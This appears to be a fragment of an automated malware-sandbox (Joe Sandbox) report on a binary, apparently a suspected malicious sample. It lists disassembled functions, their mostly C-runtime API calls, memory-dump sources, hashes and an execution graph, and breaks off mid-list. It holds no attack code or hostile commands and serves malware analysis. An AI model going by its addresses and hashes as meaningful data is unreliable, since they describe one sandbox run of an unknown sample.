                                  • Opcode Fuzzy Hash: a8942cac172f09dfd1cdfc1b2e0bf65ebecc830be2f48b96fe9bc1d522a489f0
                                  • Instruction Fuzzy Hash: 2731D5323046105BD7249A5CE88096BF7FAEBA2760B20093FF451DB7E1D779EC4083A9
                                  APIs
                                  • _localeconv.LIBCMT ref: 0041EAA0
                                    • Part of subcall function 0063AF33: __getptd.LIBCMT ref: 0063AF33
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __getptd_localeconv
                                  • String ID: false$true
                                  • API String ID: 1421026308-2658103896
                                  • Opcode ID: ec33c37baa678de3168b08d80e997cec1800c41dacc77a30a62143b9279a9874
                                  • Instruction ID: 9f07bac8818dbdf88d1bf0249f562d2a25c41be806f77280f9c4413154df1e15
                                  • Opcode Fuzzy Hash: ec33c37baa678de3168b08d80e997cec1800c41dacc77a30a62143b9279a9874
                                  • Instruction Fuzzy Hash: B5312075D0C6818BCB15DF289481666BFE2AF49310F1C44ADED874F303D676D909C796
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 004058E7
                                    • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD69
                                    • Part of subcall function 0065BD54: __CxxThrowException@8.LIBCMT ref: 0065BD7E
                                    • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD8F
                                  • _memmove.LIBCMT ref: 00405931
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                  • String ID: string too long
                                  • API String ID: 1785806476-2556327735
                                  • Opcode ID: 581c8d35fe27da5bed94ee6c4c29c0b1f74af0edc716254284dda947318169df
                                  • Instruction ID: fe8b88f9a0e379717774326513d91cb2ce5f1dc707cbfffd4cd1fcaa9a8e13fc
                                  • Opcode Fuzzy Hash: 581c8d35fe27da5bed94ee6c4c29c0b1f74af0edc716254284dda947318169df
                                  • Instruction Fuzzy Hash: FF11B4B2514B149BDB24EE78E8C093BB3A9FF51324B144A3FE487D31C1D775A8488B68
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040193B
                                    • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD69
                                    • Part of subcall function 0065BD54: __CxxThrowException@8.LIBCMT ref: 0065BD7E
                                    • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD8F
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00401952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                  • String ID: string too long
                                  • API String ID: 963545896-2556327735
                                  • Opcode ID: cba78605f68a82ce49e7065a14f1622c77ff82ff18d2d4c503214a5de30d3f6b
                                  • Instruction ID: c2cea7e1ea6b9128a75631a2b2bf39ccf89588a0b0eaf6fe25adba1571a3e9b9
                                  • Opcode Fuzzy Hash: cba78605f68a82ce49e7065a14f1622c77ff82ff18d2d4c503214a5de30d3f6b
                                  • Instruction Fuzzy Hash: BE1106723046104BD720AA5CE890A7AF3E9EF91760F10063FF692D77E1C7B49804C3A8
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00401C94
                                    • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD69
                                    • Part of subcall function 0065BD54: __CxxThrowException@8.LIBCMT ref: 0065BD7E
                                    • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD8F
                                  • _memmove.LIBCMT ref: 00401CDB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                  • String ID: string too long
                                  • API String ID: 1785806476-2556327735
                                  • Opcode ID: 2375944a4a6f7e8414832a35796bae20303f3c3520c9be5b023d117e8512a10a
                                  • Instruction ID: dc466a4410b8a437badef737a8bf2bc7ac7192ab69bd59b092e7e9cd2146d576
                                  • Opcode Fuzzy Hash: 2375944a4a6f7e8414832a35796bae20303f3c3520c9be5b023d117e8512a10a
                                  • Instruction Fuzzy Hash: 5D11DA711487145BE7249D78A8C0A2BB799AF51314F100A3FE497932D2D775E4448658
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405856
                                    • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDB6
                                    • Part of subcall function 0065BDA1: __CxxThrowException@8.LIBCMT ref: 0065BDCB
                                    • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDDC
                                  • _memmove.LIBCMT ref: 00405894
                                  Strings
                                  • invalid string position, xrefs: 00405851
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                  • String ID: invalid string position
                                  • API String ID: 1785806476-1799206989
                                  • Opcode ID: 7dc52565d4be457e8fc316c6bbb6301fbb3776693761ba892fb07848e6a5fcc3
                                  • Instruction ID: f1b391fdf39913b613b2a6ca5ff4fbe537380ea5887ccbfe4d44d873e70c66cd
                                  • Opcode Fuzzy Hash: 7dc52565d4be457e8fc316c6bbb6301fbb3776693761ba892fb07848e6a5fcc3
                                  • Instruction Fuzzy Hash: 6D11C633700A148BC724EE6DD98086BB3AAEFD5755320893FD842DB654DA71D826CBD8
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00402096
                                    • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDB6
                                    • Part of subcall function 0065BDA1: __CxxThrowException@8.LIBCMT ref: 0065BDCB
                                    • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDDC
                                  • _memmove.LIBCMT ref: 004020CF
                                  Strings
                                  • invalid string position, xrefs: 00402091
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                  • String ID: invalid string position
                                  • API String ID: 1785806476-1799206989
                                  • Opcode ID: 360e3b9430fae270ea65226de6d74c28aad8cfc974b640de082e0e73a539a4f7
                                  • Instruction ID: a89436a13e877e3da33af3665940be8a03eb1ed28cdd035564101695d2e7b95c
                                  • Opcode Fuzzy Hash: 360e3b9430fae270ea65226de6d74c28aad8cfc974b640de082e0e73a539a4f7
                                  • Instruction Fuzzy Hash: 2F01C8323003544BC725CA6CDA8496AB7AAEBD1710B24493EE681D77C1C6F6DC41D7A8
                                  APIs
                                  • _strcpy_s.LIBCMT ref: 0064E11D
                                  • __invoke_watson.LIBCMT ref: 0064E171
                                    • Part of subcall function 0064DFAC: _strcat_s.LIBCMT ref: 0064DFCB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __invoke_watson_strcat_s_strcpy_s
                                  • String ID: Od
                                  • API String ID: 312943863-1194042738
                                  • Opcode ID: 3d041f71868a7de1478b819e5a68ddf22e67a0a5aabb249086b01cf0cdc4e7b3
                                  • Instruction ID: 0cb6e68ff4e7129cb42d9cbd664d60d965e4d9997bf68d529b1bfa7178f8a2a2
                                  • Opcode Fuzzy Hash: 3d041f71868a7de1478b819e5a68ddf22e67a0a5aabb249086b01cf0cdc4e7b3
                                  • Instruction Fuzzy Hash: 9CF0F6B24802487FDF516E60CC02DD73B5FAF11360F488065FA094B112E3739D18C790
                                  APIs
                                  • __getptd.LIBCMT ref: 03650BE6
                                    • Part of subcall function 0364EA0D: __getptd_noexit.LIBCMT ref: 0364EA10
                                    • Part of subcall function 0364EA0D: __amsg_exit.LIBCMT ref: 0364EA1D
                                  • __CallSettingFrame@12.LIBCMT ref: 03650C32
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: CallFrame@12Setting__amsg_exit__getptd__getptd_noexit
                                  • String ID: j
                                  • API String ID: 4140145597-2137352139
                                  • Opcode ID: 4255597884e4c706d015ab5a2cc04f3f2598fbc4e01f63f3b4cdc71a0b6bc24f
                                  • Instruction ID: 7bc3d2a50003b7b84e78ef170cf7c934b947d52cacec096edb195645c77d320a
                                  • Opcode Fuzzy Hash: 4255597884e4c706d015ab5a2cc04f3f2598fbc4e01f63f3b4cdc71a0b6bc24f
                                  • Instruction Fuzzy Hash: FF117975C09255EFCB21DF18C5983ACBB70BB0671CF18819EE8A92F582C3759952CB81
                                  APIs
                                  • __getptd.LIBCMT ref: 10010BE2
                                    • Part of subcall function 1000EA09: __getptd_noexit.LIBCMT ref: 1000EA0C
                                    • Part of subcall function 1000EA09: __amsg_exit.LIBCMT ref: 1000EA19
                                  • __CallSettingFrame@12.LIBCMT ref: 10010C2E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: CallFrame@12Setting__amsg_exit__getptd__getptd_noexit
                                  • String ID: j
                                  • API String ID: 4140145597-2137352139
                                  • Opcode ID: 4255597884e4c706d015ab5a2cc04f3f2598fbc4e01f63f3b4cdc71a0b6bc24f
                                  • Instruction ID: c06a1c58be8673991bec95017757c486347b6274bbde7add83dd351e2b3b0df6
                                  • Opcode Fuzzy Hash: 4255597884e4c706d015ab5a2cc04f3f2598fbc4e01f63f3b4cdc71a0b6bc24f
                                  • Instruction Fuzzy Hash: E1118E34E09655DBDB11DB54C84539CBB70FB05318F25868EE8A82F183C3B4A995CFC1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Delete
                                  • String ID: \m
                                  • API String ID: 1035893169-431485060
                                  • Opcode ID: 822fa9df64cbc7ec8feff1f50b72d2099273833969813342946208439e62653f
                                  • Instruction ID: 1c1cf9d08d11a86594c6bea3167a093f2457405adb1f7569580990d58b4f12f3
                                  • Opcode Fuzzy Hash: 822fa9df64cbc7ec8feff1f50b72d2099273833969813342946208439e62653f
                                  • Instruction Fuzzy Hash: B7F0EC32A2051663AB04B7F0782B62D2957BB8A311F406438E6C25A2D3DE28D8128F63
                                  APIs
                                  • __getptd.LIBCMT ref: 03650F57
                                    • Part of subcall function 0364EA0D: __getptd_noexit.LIBCMT ref: 0364EA10
                                    • Part of subcall function 0364EA0D: __amsg_exit.LIBCMT ref: 0364EA1D
                                  • __getptd.LIBCMT ref: 03650F65
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                  • String ID: csm
                                  • API String ID: 803148776-1018135373
                                  • Opcode ID: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                  • Instruction ID: 076c989be42ff67f32ac7e0cfec32a4ae71e8e02cf48e697d35b3f2986f2efbf
                                  • Opcode Fuzzy Hash: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                  • Instruction Fuzzy Hash: 5A0112398017059BCB24DE24C644AADF7B9BB01311F28486EEC409A790EB79C5809F46
                                  APIs
                                  • __getptd.LIBCMT ref: 10010F53
                                    • Part of subcall function 1000EA09: __getptd_noexit.LIBCMT ref: 1000EA0C
                                    • Part of subcall function 1000EA09: __amsg_exit.LIBCMT ref: 1000EA19
                                  • __getptd.LIBCMT ref: 10010F61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                  • String ID: csm
                                  • API String ID: 803148776-1018135373
                                  • Opcode ID: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                  • Instruction ID: 0b68c18b04a2594aeb466f25acbeb17461be63212fdf9adf152435a349185842
                                  • Opcode Fuzzy Hash: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                  • Instruction Fuzzy Hash: 41012C38A043458EDB24CF61D45569DB7F5EF04291F20452EF4815AA61CBB0E9C2CF42
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Parent_memset
                                  • String ID: 7Au6A
                                  • API String ID: 2014191161-2090459501
                                  • Opcode ID: 63b05860435bd514bd2bef04288b19d4e1b20f1baf9283824190bdfb4a524e35
                                  • Instruction ID: fe2b1d37f79ae73655800efbb9a941a0f5eb0a7eb8cac4f69c93fc6f8c5f1ac1
                                  • Opcode Fuzzy Hash: 63b05860435bd514bd2bef04288b19d4e1b20f1baf9283824190bdfb4a524e35
                                  • Instruction Fuzzy Hash: BAF06D72500705ABE7208F26D804F97BBE9FFD0768F10C42EE8A98B211D3B0E801CB94
                                  APIs
                                  • EnterCriticalSection.KERNEL32(0073B1D0,?,?,?,?,0054D79D,00000010,00000008,00544598,0054452F,005381E4,005382F8,0040E0F1), ref: 00564C6D
                                  • InitializeCriticalSection.KERNEL32(-0073B038,?,?,?,?,0054D79D,00000010,00000008,00544598,0054452F,005381E4,005382F8,0040E0F1), ref: 00564C7F
                                  • LeaveCriticalSection.KERNEL32(0073B1D0,?,?,?,?,0054D79D,00000010,00000008,00544598,0054452F,005381E4,005382F8,0040E0F1), ref: 00564C8C
                                  • EnterCriticalSection.KERNEL32(-0073B038,?,?,?,?,0054D79D,00000010,00000008,00544598,0054452F,005381E4,005382F8,0040E0F1), ref: 00564C9C
                                    • Part of subcall function 005381C8: __CxxThrowException@8.LIBCMT ref: 005381DE
                                    • Part of subcall function 005381C8: __EH_prolog3.LIBCMT ref: 005381EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                  • String ID:
                                  • API String ID: 2895727460-0
                                  • Opcode ID: 19adabfb396c4316b86e330d61b6d73c0d74e3d871021e71914355271bbf5929
                                  • Instruction ID: 2e2847c5477703053a214fc31ff6fa624893beb1846d2c6b0b1de47cfd329d3d
                                  • Opcode Fuzzy Hash: 19adabfb396c4316b86e330d61b6d73c0d74e3d871021e71914355271bbf5929
                                  • Instruction Fuzzy Hash: C9F0C273202209AFEB141B94DD9DB29BA6AFBE1351F412125E20453152DB748941CEA5
                                  APIs
                                  • EnterCriticalSection.KERNEL32(0073A27C,?,?,?,?,0054DCC2,?,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D724
                                  • TlsGetValue.KERNEL32(0073A260,?,?,?,?,0054DCC2,?,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D738
                                  • LeaveCriticalSection.KERNEL32(0073A27C,?,?,?,?,0054DCC2,?,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D74E
                                  • LeaveCriticalSection.KERNEL32(0073A27C,?,?,?,?,0054DCC2,?,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D759
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Leave$EnterValue
                                  • String ID:
                                  • API String ID: 3969253408-0
                                  • Opcode ID: 963ec33397e15d755683d7068fc250333d53209a43c35716d59d7821a6acbce2
                                  • Instruction ID: a31ba7790e31959afcdf96f5812570665656670ee15346c31ccdfe3d9740748d
                                  • Opcode Fuzzy Hash: 963ec33397e15d755683d7068fc250333d53209a43c35716d59d7821a6acbce2
                                  • Instruction Fuzzy Hash: 5EF05E76200205AFC7209F58EC88D9ABBFEFA843A53165926F80697511DA35F805CBF2

                                  Execution Graph

                                  Execution Coverage:1.6%
                                  Dynamic/Decrypted Code Coverage:10.2%
                                  Signature Coverage:1.3%
                                  Total number of Nodes:826
                                  Total number of Limit Nodes:55
                                  execution_graph 144085 6c631112 144123 6c6b24fa 144085->144123 144091 6c631144 __flsbuf 144093 6c6311a6 144091->144093 144119 6c6311ca _memset 144091->144119 144138 6c6514fc 110 API calls 4 library calls 144091->144138 144139 6c6514fc 110 API calls 4 library calls 144093->144139 144096 6c6311b0 144097 6c6311c0 144096->144097 144140 6c6514fc 110 API calls 4 library calls 144096->144140 144141 6c6514fc 110 API calls 4 library calls 144097->144141 144101 6c631433 144102 6c631467 144101->144102 144149 6c6514fc 110 API calls 4 library calls 144101->144149 144114 6c63147a __flsbuf 144102->144114 144152 6c654c0a 144 API calls 5 library calls 144102->144152 144105 6c6514fc 110 API calls 144105->144119 144106 6c63144d 144108 6c63145d 144106->144108 144150 6c6514fc 110 API calls 4 library calls 144106->144150 144151 6c6514fc 110 API calls 4 library calls 144108->144151 144113 6c631491 144154 6c6b1f75 144113->144154 144114->144113 144153 6c6b28b7 96 API calls 5 library calls 144114->144153 144117 6c6314a0 144119->144101 144119->144105 144121 6c651ad3 111 API calls 144119->144121 144122 6c65070e 101 API calls 144119->144122 144142 6c6314a4 144 API calls 3 library calls 144119->144142 144143 6c63f780 162 API calls 144119->144143 144144 6c637259 61 API calls __floor_pentium4 144119->144144 144145 6c637313 61 API calls 144119->144145 144146 6c646e7c 145 API calls 3 library calls 144119->144146 144147 6c6b174a 255 API calls 144119->144147 144148 6c645698 222 API calls 144119->144148 144121->144119 144122->144119 144162 6c6b243e 144123->144162 144125 6c631118 144125->144091 144126 6c6b1f84 144125->144126 144127 6c6b1fa2 144126->144127 144128 6c6b1fb7 144126->144128 144482 6c6b6fbc 61 API calls __getptd_noexit 144127->144482 144128->144127 144130 6c6b1fbe 144128->144130 144484 6c6b61ad 96 API calls 9 library calls 144130->144484 144131 6c6b1fa7 144483 6c6b6f31 10 API calls __invalid_parameter_noinfo_noreturn 144131->144483 144134 6c6b1fe4 144135 6c631138 144134->144135 144485 6c6b5f42 91 API calls 5 library calls 144134->144485 144137 6c651814 97 API calls 2 library calls 144135->144137 144137->144091 144138->144093 144139->144096 144140->144097 144141->144119 144142->144119 144143->144119 144144->144119 144145->144119 144146->144119 144147->144119 144148->144119 144149->144106 144150->144108 144151->144102 144152->144114 144153->144113 144155 6c6b1f7f IsDebuggerPresent 144154->144155 144156 6c6b1f7d 144154->144156 144486 6c6c103d 144155->144486 144156->144117 144159 6c6b5f09 SetUnhandledExceptionFilter UnhandledExceptionFilter 144160 6c6b5f2e GetCurrentProcess TerminateProcess 144159->144160 144161 6c6b5f26 __call_reportfault 144159->144161 144160->144117 144161->144160 144164 